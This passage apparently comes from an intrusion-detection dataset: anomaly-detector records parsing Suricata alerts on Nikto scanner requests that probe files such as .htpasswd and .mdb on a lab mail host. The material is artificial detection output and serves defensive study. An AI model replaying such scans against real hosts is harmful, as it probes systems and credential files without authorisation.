"{\"timestamp\":\"2020-03-04T19:18:34.312371+0000\",\"flow_id\":1737271305486500,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" 
], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.314733 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46914 -> 192.168.10.154:80", "/parser/model/time": 1583349514.314733, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46914, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.314733 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46914 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ 
"\\/bISn4adA.htpasswd", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.314940+0000\",\"flow_id\":220086993078258,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.31494, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":220086993078258,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": 
",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.htpasswd\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.htpasswd\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.htpasswd", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": 
"\\/bISn4adA.htpasswd", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46914, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":220086993078258,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 220086993078258, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.314940+0000\",\"flow_id\":220086993078258,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) 
detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.316707 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46916 -> 192.168.10.154:80", "/parser/model/time": 1583349514.316707, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46916, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.316707 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46916 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.signature", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.316954+0000\",\"flow_id\":1437349444244092,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.316954, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1437349444244092,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.signature\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.signature\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.signature", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.signature", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46916, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1437349444244092,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1437349444244092, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.316954+0000\",\"flow_id\":1437349444244092,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], 
"Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.318931 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46918 -> 192.168.10.154:80", "/parser/model/time": 1583349514.318931, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46918, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.318931 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46918 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.html~", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.319109+0000\",\"flow_id\":2026627547191976,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.319109, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2026627547191976,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46918,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html~\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html~\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.html~\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.html~\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.html~", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.html~", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", 
